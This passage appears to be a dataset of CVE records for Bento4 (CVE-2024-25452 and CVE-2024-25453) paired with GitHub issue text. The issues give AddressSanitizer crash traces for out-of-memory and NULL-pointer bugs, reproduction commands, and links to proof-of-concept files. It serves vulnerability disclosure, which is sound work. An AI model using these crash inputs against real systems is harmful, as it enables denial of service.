AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 ==977537==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==977537==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info, mp42aac, mp42avc, mp4decrypt, mp4dump ### How to reproduce $ mp4info, mp4dump} poc-file or $ {mp42aac, mp42avc, mp4decrypt} poc-file /dev/null poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11720958/poc-file.txt) --- end body --- comments : --- start comments --- --- end comments ---
7,752
CVE-2024-25452
2024-02-09T15:15:09.193
Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_UrlAtom::AP4_UrlAtom() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/873" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "Exploit", "Issue Tracking" ]
[ "axiomatic-systems", "Bento4" ]
Issue
Hi, There is another out-of-memory bug in the latest version (1.6.0-640) of mp4info because of the function AP4_UrlAtom::AP4_UrlAtom() at Ap4UrlAtom.cpp:71. Unlike the issue #771, this vunerability happened in the different function AP4_UrlAtom::AP4_UrlAtom(). Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==973793==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xdd000000 bytes #0 0x7f40c85f9787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x55f6be8e4ce7 in AP4_UrlAtom::AP4_UrlAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:71 #2 0x55f6be8e4ed2 in AP4_UrlAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:47 #3 0x55f6be843fc4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:585 #4 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x55f6be865836 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #6 0x55f6be865c13 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #7 0x55f6be841d44 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #8 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #9 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #10 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #11 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #12 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #13 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #20 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #21 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #22 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #23 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #24 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #25 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #26 0x55f6be8e02a8 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.cpp:165 #27 0x55f6be84239f in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.h:58 #28 0x55f6be84239f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:413 #29 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #30 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 ==973793==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==973793==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721073/poc-file.txt)
Out-of-memory bug from AP4_UrlAtom::AP4_UrlAtom() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/873/comments
1
2023-06-12T10:03:27Z
2024-02-20T02:41:04Z
https://github.com/axiomatic-systems/Bento4/issues/873
1,752,379,751
873
[ -0.03406800329685211, -0.0019192930776625872, -0.015231228433549404, 0.0006776885129511356, 0.026645855978131294, -0.009638236835598946, -0.047065552324056625, 0.038095660507678986, -0.014747558161616325, 0.050407275557518005, 0.0221960861235857, 0.017332997173070908, 0.025590574368834496, ...
1,115
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Out-of-memory bug from AP4_UrlAtom::AP4_UrlAtom() in v1.6.0-640 Issue date: --- start body --- Hi, There is another out-of-memory bug in the latest version (1.6.0-640) of mp4info because of the function AP4_UrlAtom::AP4_UrlAtom() at Ap4UrlAtom.cpp:71. Unlike the issue #771, this vunerability happened in the different function AP4_UrlAtom::AP4_UrlAtom(). Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==973793==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0xdd000000 bytes #0 0x7f40c85f9787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x55f6be8e4ce7 in AP4_UrlAtom::AP4_UrlAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:71 #2 0x55f6be8e4ed2 in AP4_UrlAtom::Create(unsigned int, AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4UrlAtom.cpp:47 #3 0x55f6be843fc4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:585 #4 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x55f6be865836 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #6 0x55f6be865c13 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #7 0x55f6be841d44 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #8 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #9 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #10 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #11 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #12 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #13 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #20 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #21 0x55f6be852ced in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #22 0x55f6be841cf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #23 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #24 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #25 0x55f6be8527c3 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #26 0x55f6be8e02a8 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.cpp:165 #27 0x55f6be84239f in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4TrakAtom.h:58 #28 0x55f6be84239f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:413 #29 0x55f6be845530 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #30 0x55f6be85241a in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 ==973793==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==973793==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721073/poc-file.txt) --- end body --- comments : --- start comments --- --- end comments ---
7,647
CVE-2024-25453
2024-02-09T15:15:09.240
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/204" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bent...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "Exploit", "Issue Tracking" ]
[ "axiomatic-systems", "Bento4" ]
Issue
On master compiled on 2017-09-10 (but please confirm if this affects current stable): ``` # mp4compact $FILE out.mp4 ASAN:DEADLYSIGNAL ================================================================= ==156195==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000060a4b3 bp 0x7ffed6dd9e30 sp 0x7ffed6dd9e30 T0) ==156195==The signal is caused by a READ memory access. ==156195==Hint: address points to the zero page. #0 0x60a4b2 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 #1 0x5421ec in AP4_CompactingProcessor::TrackHandler::ProcessTrack() /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:132:15 #2 0x5bef58 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4Processor.cpp:617:35 #3 0x542f69 in main /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:25 #4 0x7f96ff492680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289 #5 0x44ec88 in _start (/usr/bin/mp4compact+0x44ec88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==156195==ABORTING ``` Testcase: https://github.com/asarubbo/poc/blob/master/00363-bento4-NULLptr-AP4_StszAtom_GetSampleSize
NULL pointer dereference in AP4_StszAtom::GetSampleSize (Ap4StszAtom.cpp)
https://api.github.com/repos/axiomatic-systems/Bento4/issues/204/comments
0
2017-09-15T07:10:24Z
2017-12-17T00:59:26Z
https://github.com/axiomatic-systems/Bento4/issues/204
257,947,117
204
[ -0.003325453493744135, 0.034735873341560364, -0.005418977700173855, 0.027797767892479897, 0.04338205233216286, -0.004179490264505148, -0.04008683189749718, 0.05151429772377014, -0.018320225179195404, 0.017519094049930573, -0.02740475907921791, 0.014836057089269161, 0.022854935377836227, 0....
1,116
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL pointer dereference in AP4_StszAtom::GetSampleSize (Ap4StszAtom.cpp) Issue date: --- start body --- On master compiled on 2017-09-10 (but please confirm if this affects current stable): ``` # mp4compact $FILE out.mp4 ASAN:DEADLYSIGNAL ================================================================= ==156195==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000060a4b3 bp 0x7ffed6dd9e30 sp 0x7ffed6dd9e30 T0) ==156195==The signal is caused by a READ memory access. ==156195==Hint: address points to the zero page. #0 0x60a4b2 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 #1 0x5421ec in AP4_CompactingProcessor::TrackHandler::ProcessTrack() /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:132:15 #2 0x5bef58 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4Processor.cpp:617:35 #3 0x542f69 in main /tmp/Bento4-master-2017-09-10/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:25 #4 0x7f96ff492680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289 #5 0x44ec88 in _start (/usr/bin/mp4compact+0x44ec88) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /tmp/Bento4-master-2017-09-10/Source/C++/Core/Ap4StszAtom.cpp:150:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==156195==ABORTING ``` Testcase: https://github.com/asarubbo/poc/blob/master/00363-bento4-NULLptr-AP4_StszAtom_GetSampleSize --- end body --- comments : --- start comments --- --- end comments ---
1,845
CVE-2024-25453
2024-02-09T15:15:09.240
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/204" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bent...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "Exploit", "Issue Tracking" ]
[ "axiomatic-systems", "Bento4" ]
Issue
Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_StszAtom::GetSampleSize(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4960 (media timescale units) duration: 4960 (ms) time scale: 1000 fragments: no Found 1 Tracks Track 1: flags: 15 ENABLED IN-MOVIE IN-PREVIEW id: 1 type: Video duration: 4960 ms language: eng media: sample count: 16449660 timescale: 25 duration: 124 (media timescale units) duration: 4960 (ms) AddressSanitizer:DEADLYSIGNAL ==973817==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564f30ae87de bp 0x7ffd3baf13c0 sp 0x7ffd3baf13c0 T0) ==973817==The signal is caused by a READ memory access. ==973817==Hint: address points to the zero page. #0 0x564f30ae87dd in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 #1 0x564f30b193c1 in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomSampleTable.cpp:162 #2 0x564f30a3993d in ScanMedia /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1270 #3 0x564f30a422ad in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1331 #4 0x564f30a422ad in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #5 0x564f30a42b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #6 0x564f30a336f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #7 